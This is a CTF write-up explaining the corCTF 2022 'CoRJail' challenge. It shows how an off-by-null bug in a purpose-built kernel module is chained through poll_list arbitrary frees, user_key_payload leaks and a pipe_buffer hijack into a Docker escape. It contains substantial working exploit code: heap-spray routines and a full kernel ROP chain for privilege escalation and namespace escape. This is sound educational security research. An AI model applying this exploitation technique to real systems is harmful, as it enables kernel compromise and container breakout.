/ CTF, RESEARCH

[corCTF 2022] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel

CoRJail is a kernel exploitation / Docker escape challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters exploiting a Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from a nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!

Overview

Last year FizzBuzz101 and me, designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. During this year, the technique has been extensively used in real world exploits and later extended to be used with FUSE instead of userfaultfd.

For corCTF 2022, we decided to do the same, designing two challenges of which solutions required a novel approach. I decided to write a kernel exploitation / Docker escape challenge, CoRJail, demonstrating a novel technique I originally used to compromise Google’s kCTF Kubernetes infrastructure. This novel approach allows to get a powerful arbitrary free primitive in almost every general purpose cache exploiting poll_list objects. FizzBuzz101 instead, designed a challenge, Cache of Castaways, of which solution required a cross-cache overflow into cred_jar to corrupt current task’s cred structure and get root privileges.

CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image (improperly called CoROS :P). The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing access to the Linux Kernel Key Retention Service from within the container. The custom seccomp profile can be found here.

The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.

All modern protections, like KASLR, SMEP, SMAP, KPTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED etc. were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset CONFIG_DEBUG_FS and CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.

The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter. Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example, to get per-CPU usage count of read() and write() a user can simply use echo -n 'sys_read,sys_write' > /proc_rw/cormon.

The default CoRMon filter was actually a hint, indeed it displayed many syscalls I used in my exploit: poll(), keyctl() and setxattr().

If you want to try to solve the challenge before reading the rest of the article, you can find it in the corCTF 2022 Public Archive. Please note that I could not upload the coros.qcow2 image on Github because of its size, so you will need to build it yourself using the provided script.

TL;DR

Exploit a Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.

It’s Only A Zero, What Could Go Wrong?

Given the complexity of the exploitation phase and the 48 hours limit, I decided to make the bug extremely easy to spot and trigger. On the other hand I decided to not provide source code, considering the reverse engineering process would not have taken too long. Here is the original CoRMon source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/seq_file.h>
#include <trace/syscall.h>
#include <asm/syscall.h>
#include <asm/ftrace.h>

MODULE_AUTHOR("D3v17");
MODULE_LICENSE("GPL");

extern struct syscall_metadata *syscall_nr_to_meta(int nr);
extern const char *get_syscall_name(int syscall_nr);

static int get_syscall_nr(char *sc);
static int update_filter(char *syscalls);
static int cormon_proc_open(struct inode *inode, struct  file *file);
static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf,size_t count, loff_t *ppos); 
static void *cormon_seq_start(struct seq_file *seqfile, loff_t *pos);
static void *cormon_seq_next(struct seq_file *seqfile, void *v, loff_t *pos);
static void cormon_seq_stop(struct seq_file *seqfile, void *v);
static int cormon_seq_show(struct seq_file *f, void *ppos);
static int init_procfs(void);
static void cleanup_procfs(void);

DECLARE_PER_CPU(u64[NR_syscalls], __per_cpu_syscall_count);

static uint8_t filter[NR_syscalls];
static struct proc_dir_entry *cormon;
static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv,sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";


static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};


static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};


static int get_syscall_nr(char *sc)
{
    struct syscall_metadata *entry;
    int nr;

    for (nr = 0; nr < NR_syscalls; nr++)
    {
        entry = syscall_nr_to_meta(nr);

        if (!entry)
            continue;

        if (arch_syscall_match_sym_name(entry->name, sc))
            return nr;
    }

    return -EINVAL;
}


static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}


static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}


static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}


static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}


static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}


static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}


static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}


static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}


static void cleanup_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Exit] Cleaning up...\n");

    remove_proc_entry("cormon", NULL);

    printk(KERN_INFO "[CoRMon::Exit] Cleanup done, bye!\n");
}


module_init(init_procfs);
module_exit(cleanup_procfs);

We can interact with the module through a procfs interface using read() and write(). When we use write() the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function instead, is used to display syscalls information when we use read().

As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from source code and ignore the rest:

static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    [...]

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; // [1]

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); // [2]
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len)) // [3]
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00'; // [4]

    [...]
}

If the number of bytes written is greater than PAGE_SIZE (4096) then the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. [1]

Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2] and the list of syscalls is copied from user-space to kernel-space: it will be parsed by the update_filter() function. [3] The list, now copied in kernel-space, is subsequently null terminated. [4]

The check is clearly not covering the case where the number of bytes written is equal to PAGE_SIZE. Indeed, in that case, len would be equal to count, and the line syscalls[len] = '\x00', would result in syscalls[4096] = '\x00', causing the null byte to be written out of bounds.

Apparently, considering the hardened kernel and the limited attack surface from within the container, a single zero written out of bounds, does not seem too dangerous, but as we are going to demonstrate, it will be more than enough to escape from the container and get root privileges on the host.

A Dive Into poll_list Objects

As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features. Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so for this time the old good msg_msg will be left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.

The technique we will cover in this article, is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, here instead we only have a single null byte written out of bounds.

poll_list objects, are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.

int poll(struct pollfd fds[], nfds_t nfds, int timeout);

poll() accepts three arguments:

  • fds: an array of pollfd structures.
  • nfds: the number of pollfd structures in the fds array.
  • timeout: the number of milliseconds for an event to occur.
struct pollfd {
    int   fd;
    short events;
    short revents;
};

struct poll_list {
    struct poll_list *next; // [1]
    int len; // [2]
    struct pollfd entries[]; // [3]
};

The poll_list structure, is composed by a pointer to the next poll_list [1], a length field, corresponding to the number of pollfd structures in the entries array [2], and entries, a flexible array of pollfd structures [3]. Each entry is 8 bytes in size.

When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array from user-space to kernel-space:

#define POLL_STACK_ALLOC	256
#define PAGE_SIZE 4096

#define POLLFD_PER_PAGE  ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd))

#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list))  / \
			sizeof(struct pollfd))

[...]

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
		struct timespec64 *end_time)
{

    struct poll_wqueues table;
    int err = -EFAULT, fdcount, len;
    /* Allocate small arguments on the stack to save memory and be
       faster - use long to make sure the buffer is aligned properly
       on 64 bit archs to avoid unaligned access */
    long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // [1]
    struct poll_list *const head = (struct poll_list *)stack_pps;
    struct poll_list *walk = head;
 	unsigned long todo = nfds;

	if (nfds > rlimit(RLIMIT_NOFILE))
		return -EINVAL;

	len = min_t(unsigned int, nfds, N_STACK_PPS); // [2]

	for (;;) {
		walk->next = NULL;
		walk->len = len;
		if (!len)
			break;

		if (copy_from_user(walk->entries, ufds + nfds-todo,
					sizeof(struct pollfd) * walk->len))
			goto out_fds;

		todo -= walk->len;
		if (!todo)
			break;

		len = min(todo, POLLFD_PER_PAGE); // [3]
		walk = walk->next = kmalloc(struct_size(walk, entries, len),
					    GFP_KERNEL); // [4]
		if (!walk) {
			err = -ENOMEM;
			goto out_fds;
		}
	}

	poll_initwait(&table);
	fdcount = do_poll(head, &table, end_time); // [5]
	poll_freewait(&table);

	if (!user_write_access_begin(ufds, nfds * sizeof(*ufds))and)
		goto out_fds;

	for (walk = head; walk; walk = walk->next) {
		struct pollfd *fds = walk->entries;
		int j;

		for (j = walk->len; j; fds++, ufds++, j--)
			unsafe_put_user(fds->revents, &ufds->revents, Efault);
  	}
	user_write_access_end();

	err = fdcount;
out_fds:
	walk = head->next;
	while (walk) { // [6]
		struct poll_list *pos = walk;
		walk = walk->next;
		kfree(pos);
	}

	return err;

Efault:
	user_write_access_end();
	err = -EFAULT;
	goto out_fds;
}

do_sys_poll() has two paths, a fast path, and a slow one. As we can see at the beginning of the function, stack_pps [1], a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries [2]. This is the fast path: entries are stored on the stack to save memory and improve speed.

If we submit more than 30 pollfd entries, we enter the slow path, and the remaining ones will be allocated on the kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]

It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. [3] If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop will continue until all entries have been stored in kernel memory.

Let’s say for example we call poll(), providing 510 + 1 file descriptors to the syscall. This, in kernel space, will result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list with a single entry allocated in kmalloc-32. The structures will be connected in a singly linked list:

After all poll_list objects have been allocated, there is a call to do_poll() [5]: it will monitor provided file descriptors until a specific event occurs or the timer expires. The end_time variable here, corresponds to the timeout variable we passed as third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time, then, when timer expires, they will be automatically freed.

The very interesting part, is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them. [6] Now let’s look at what we have from an attacker’s prospective.

We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed by its next field (first QWORD) is automatically freed when a timer, that we control, expires. This means that given a Out-Of-Bounds Write or a Use-After-Free Write primitive we can overwrite the next field of a poll_list structure with the address of a target object. Once the timer expires, that object will be automatically freed.

The only constraint, is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop, will treat it as a valid pointer, trying to traverse the list. This is not a problem, we can use a misaligned arbitrary free primitive or we can simply target objects of which first QWORD is equal to zero.

In the specific case of kmalloc-4k, if the poll_list next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object. When timer expires, the kernel will be tricked into freeing the wrong object. This trick, is exactly what we are going to use in our exploit.

The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall will block until a specific event occurs or timer expires.

#define N_STACK_PPS 30
#define POLLFD_PER_PAGE 510
#define POLL_LIST_SIZE 16

#define NFDS(size) (((size - POLL_LIST_SIZE) / sizeof(struct pollfd)) + N_STACK_PPS);


pthread_t poll_tid[0x1000];
size_t poll_threads;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;


struct t_args
{
    int id;
    int nfds;
    int timeout;
};


void *alloc_poll_list(void *args)
{
    struct pollfd *pfds;
    int nfds, timeout, id;

    id    = ((struct t_args *)args)->id;
    nfds  = ((struct t_args *)args)->nfds;
    timeout = ((struct t_args *)args)->timeout;

    pfds = calloc(nfds, sizeof(struct pollfd));

    for (int i = 0; i < nfds; i++)
    {
        pfds[i].fd = fds[0];
        pfds[i].events = POLLERR;
    }

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);

    //printf("[Thread %d] Start polling...\n", id);
    int ret = poll(pfds, nfds, timeout);
    //printf("[Thread %d] Polling complete: %d!\n", id, ret); 
}


void create_poll_thread(int id, size_t size, int timeout)
{
    struct t_args *args;

    args = calloc(1, sizeof(struct t_args));

    if (size > PAGE_SIZE)
        size = size - ((size/PAGE_SIZE) * sizeof(struct poll_list));

    args->id = id;
    args->nfds = NFDS(size);
    args->timeout = timeout;

    pthread_create(&poll_tid[id], 0, alloc_poll_list, (void *)args);
}


void join_poll_threads(void)
{
    for (int i = 0; i < poll_threads; i++)
        pthread_join(poll_tid[i], NULL);
        
    poll_threads = 0;
}

[...]

fds[i] = open("/etc/passwd", O_RDONLY);

for (int i = 0; i < 8; i++)
    create_poll_thread(i, 4096 + 32, 3000);

join_poll_threads();

[...]

The Exploit - From Zero To Information Leak

The strategy we are going to use in the first part of the exploit, consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer expires, that object will be automatically freed.

We need to choose a target structure that once arbirarily freed, can be corrupted and can give us a Out-Of-Bounds Read primitive, with subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by the custom seccomp profile, we can opt for user_key_payload instead.

The problem with this structure, is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating a user key.

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
	 size_t size, int flags)
{
    [...]
    
    if (size > XATTR_SIZE_MAX)
        return -E2BIG;
    kvalue = kvmalloc(size, GFP_KERNEL); // [1]
    if (!kvalue)
        return -ENOMEM;
    if (copy_from_user(kvalue, value, size)) { // [2]
        error = -EFAULT;
        goto out;
    }
    
    [...]

out:
    kvfree(kvalue); // [3]

    return error;
}

With setxattr(), we can allocate a chunk of arbitrary size [1] and fill it with arbitrary data [2], then, it will be automatically freed right before the function returns [3]. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero. We simply need to call setxattr() right before alloc_key(): because of freelists LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. With this in mind, we can start writing our exploit:

    [...]

    assign_to_core(0); // [1]

    for (int i = 0; i < 2048; i++) // [2]
        alloc_seq_ops(i);

    for (int i = 0; i < 72; i++)
    {   
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [3]
    }
    
    for (int i = 0; i < 14; i++)
        create_poll_thread(i, 4096 + 24, 3000, false); // [4]

    for (int i = 72; i < MAX_KEYS; i++) 
    {
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [5]
    }
    
    [...]

First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. [1] Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. [2]

We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. [3] As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.

Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. [4] At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.

We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]

We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:

    [...]

    write(fd, data, PAGE_SIZE); // [1]

    join_poll_threads(); // [2]

    [...]

We can trigger the allocation of a chunk in kmalloc-4k simply writing 4096 bytes to the CoRMon procfs interface. [1] This will also cause a null byte to be written out of bounds, and will corrupt the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]

Now we can simply use join_poll_threads() and wait until timers expire and poll_list objects are automatically freed. [2] Since we corrupted one of the singly linked lists, a user_key_payload will be arbitrarily freed. [Fig. 2B]

We caused a potential Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain a Out-Of-Bounds Read primitive:

    [...]

    for (int i = 2048; i < 2048 + 128; i++)
        alloc_seq_ops(i); // [1]

    if (leak_kernel_pointer() < 0) // [2]
    {
        puts("[X] Kernel pointer leak failed, try again...");
        exit(1);
    }

    free_all_keys(true); // [3]

    for (int i = 0; i < 72; i++)
        alloc_tty(i); // [4]

    if (leak_heap_pointer(corrupted_key) < 0) // [5]
    {
        puts("[X] Heap pointer leak failed, try again...");
        exit(1);
    }

    [...]

First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its len field (an unsigned short) with the two lower bytes of the single_next pointer. In our case, the two lower bytes of single_next are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer instead, will overwrite the data field of the user key. [1] You can see the seq_operations structures in yellow in [Fig. 3A], one of them corrupted the key.

We can now use the leak_kernel_pointer() function and iterate through all the keys until we leak the proc_single_show address, this way we will identify the corrupted key and we will be able to calculate the kernel base address. [2] Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.

When we open a ptmx, two structures of our interest are allocated, the well known tty_struct in kmalloc-1024 and another one, tty_file_private in kmalloc-32. Each tty_file_private structure, has a pointer to relative tty_struct, this means that leaking a tty_file_private in kmalloc-32 we can obtain the address of a tty_struct object in kmalloc-1024.

We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), [3] with the exception of the corrupted key, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]), opening many ptmx devices. [4] Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the address of a tty_struct object. [5] [Fig. 3B]

The Exploit - Hijacking Control Flow

We have made some progress: from a single Null Byte Overflow now we know the kernel base address and the address of an object in kmalloc-1024. Now we need to arbitrarily free this object.

    [...]

    for (int i = 2048; i < 2048 + 128; i++)
        free_seq_ops(i); // [1]

    for (int i = 0; i < 192; i++)
        create_poll_thread(i, 24, 3000, true); // [2]

    free_key(corrupted_key); // [3]
    sleep(1); // GC key

    *(uint64_t *)&data[0] = target_object - 0x18; // [4]

    for (int i = 0; i < MAX_KEYS; i++)
    {
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [5]
    }

    [...]

First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) [1], then we replace them with poll_list objects (green chunks in [Fig. 4A]) [2]. Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]

Now we free the corrupted key, causing a potential Use-After-Free situation over the poll_list. [3] To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to target object - 0x18 bytes [4], then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory. In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5] Doing so, we will to overwrite the next field of the poll_list structure in kmalloc-32 with the address of our target object minus 0x18 bytes. [Fig. 4B]

Originally my goal was to arbitrarily free a tty_struct and get RIP control overwriting its tty_operations pointer. Then I changed my mind (too many checks!), and I decided to target a pipe_buffer structure.

    [...]
    
    for (int i = 0; i < 72; i++)
        free_tty(i); // [1]

    sleep(1); // GC TTYs

    for (int i = 0; i < 1024; i++)
        alloc_pipe_buff(i); // [2]

    [...]
    
    free_all_keys(false);

    for (int i = 0; i < 31; i++)
        keys[i] = alloc_key(n_keys++, buff, 600); // [3]

    for (int i = 0; i < 1024; i++)
        release_pipe_buff(i); // [4]

    [...]

We proceed freeing all the TTYs, closing the ptmx devices [1], then we spray many pipe_buffer objects [2]. This way we replace all the tty_struct with pipe_buffer in kmalloc-1024. Then, we wait until timers expire, and the pipe_buffer object pointed by the next field of the corrupted poll_list, is automatically freed. [Fig. 5.A]

Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. [3] One of the key payloads will overwrite the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget. Now we only need to close all pipes, triggering the call to pipe_release(). [4] This, will execute our stack pivot gadget and we will be finally able to hijack control flow. [Fig. 5B]

The Exploit - Escaping From The Container

We started with a single Off-By-One vulnerability and we finally managed to hijack control flow. The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look to what I used in the exploit:

    buff = (char *)calloc(1, 1024);

    // Stack pivot    [1]
    *(uint64_t *)&buff[0x10] = target_object + 0x30;             // anon_pipe_buf_ops
    *(uint64_t *)&buff[0x38] = kernel_base + 0xffffffff81882840; // push rsi ; in eax, dx ; jmp qword ptr [rsi + 0x66]
    *(uint64_t *)&buff[0x66] = kernel_base + 0xffffffff810007a9; // pop rsp ; ret
    *(uint64_t *)&buff[0x00] = kernel_base + 0xffffffff813c6b78; // add rsp, 0x78 ; ret

    // ROP
    rop = (uint64_t *)&buff[0x80];

    // creds = prepare_kernel_cred(0)   [2]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff810ebc90; // prepare_kernel_cred

    // commit_creds(creds)    [3]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
    *rop ++= kernel_base + 0xffffffff810eba40; // commit_creds

    // task = find_task_by_vpid(1)    [4]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= 1;                                // pid
    *rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

    // switch_task_namespaces(task, init_nsproxy)    [4]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
    *rop ++= kernel_base + 0xffffffff8100051c; // pop rsi ; ret
    *rop ++= kernel_base + 0xffffffff8245a720; // init_nsproxy;
    *rop ++= kernel_base + 0xffffffff810ea4e0; // switch_task_namespaces

    // new_fs = copy_fs_struct(init_fs)    [5]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= kernel_base + 0xffffffff82589740; // init_fs;
    *rop ++= kernel_base + 0xffffffff812e7350; // copy_fs_struct;
    *rop ++= kernel_base + 0xffffffff810e6cb7; // push rax ; pop rbx ; ret

    // current = find_task_by_vpid(getpid())    [6]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= getpid();                         // pid
    *rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

    // current->fs = new_fs    [7]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0x6e0;                            // current->fs
    *rop ++= kernel_base + 0xffffffff8102396f; // add rax, rcx ; ret
    *rop ++= kernel_base + 0xffffffff817e1d6d; // mov qword ptr [rax], rbx ; pop rbx ; ret
    *rop ++= 0;                                // rbx

    // kpti trampoline    [8]
    *rop ++= kernel_base + 0xffffffff81c00ef0 + 22; // swapgs_restore_regs_and_return_to_usermode + 22
    *rop ++= 0;
    *rop ++= 0;
    *rop ++= (uint64_t)&win;
    *rop ++= usr_cs;
    *rop ++= usr_rflags;
    *rop ++= (uint64_t)(stack + 0x5000);
    *rop ++= usr_ss;

The first part of the ROP-chain has nothing special. We use a stack pivot gadget to hijack control flow [1], then prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() [4] and we use switch_task_namespaces() [5] to replace its nsproxy structure with init_nsproxy. Unfortunately, in this case, this is not enough to escape from the container.

In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, this means that we cannot use it to enter another namespace after we returned in user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.

Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can reproduce part of its behavior using copy_fs_struct() to clone the init_fs structure [5], then we locate the current task using find_task_by_vpid() [6] and we manually install the new fs_struct using a write-what-where gadget. [7] Finally, we can use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode to get a shell on the host. [8] Here is the final exploit in action:

As you can see, the flag file did not contain a real flag, but a weird message:

Hello Hacker.

Unfortunately, the flag you are looking for is not here.
You need a CoR Flag License to unlock it.

Please visit https://flag-license.cor.team to buy one.

Use the CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 to get a $0.99 discount.  

Regards,
The CoR Team.

I wanted to insert a small Easter egg in the challenge, so I created a fake website. Users were asked to visit https://flag-license.cor.team (note that at time of writing the website is still up, but when you read the article it might be down) and fill a CoR Flag License Purchase Form to buy a CoR Flag License for the modest price of $1337.00/day. The CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 (cough cough …note the sarcasm… cough cough) is the lucky one, and the player who uses it wins a free CoR Flag License. The license code, can later be used to unlock the real flag.

The final exploit can be found here: corjail_exploit.c.

